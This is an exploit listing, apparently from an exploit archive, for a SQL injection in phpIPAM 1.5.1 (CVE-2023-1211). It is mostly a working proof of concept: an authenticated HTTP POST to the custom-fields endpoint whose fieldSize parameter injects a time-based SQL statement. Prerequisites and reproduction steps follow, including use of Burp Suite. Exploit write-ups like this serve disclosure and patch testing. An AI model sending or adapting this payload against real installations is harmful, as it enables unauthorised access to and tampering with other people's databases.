Share
## https://sploitus.com/exploit?id=PACKETSTORM:212368
# Exploit Title: phpIPAM 1.5.1 - SQL Injection
    # Date: 2025-11-25
    # Exploit Author: CodeSecLab
    # Vendor Homepage:  https://github.com/phpipam/phpipam/
    # Software Link: https://github.com/phpipam/phpipam/
    # Version: 1.5.1 
    # Tested on: Windows
    # CVE : CVE-2023-1211
    
    
    Proof Of Concept
    POST /app/admin/custom-fields/edit-result.php HTTP/1.1
    Host: phpipam
    Cookie: PHPSESSID=<valid_session_id>; csrf_cookie=<valid_csrf_token>
    Content-Type: application/x-www-form-urlencoded
    
    csrf_cookie=<valid_csrf_token>&action=add&name=custom_sqli_test&fieldType=enum&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+--+&table=devices&Comment=sql_poc&NULL=YES
    
    **Prerequisites:**
    1. Valid authenticated session (PHPSESSID cookie)
    2. Valid CSRF token (obtain from `/admin/custom-fields/` page first)
    3. Target table must exist (default 'devices' table used)
    4. Field type must be enum/set to reach vulnerable code path
    
    **Manual Test Steps:**
    1. Login to phpIPAM
    2. Visit `/admin/custom-fields/` to get CSRF token
    3. Send POST request with above payload
    
    **Note:** Replace `<valid_session_id>` and `<valid_csrf_token>` with actual values from authenticated session. The `fieldSize` parameter injects SQL through enum/set type definition context.
    
    
    
    Steps to Reproduce
    Login as an admin user.
    Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie and csrf token.
    Observe the result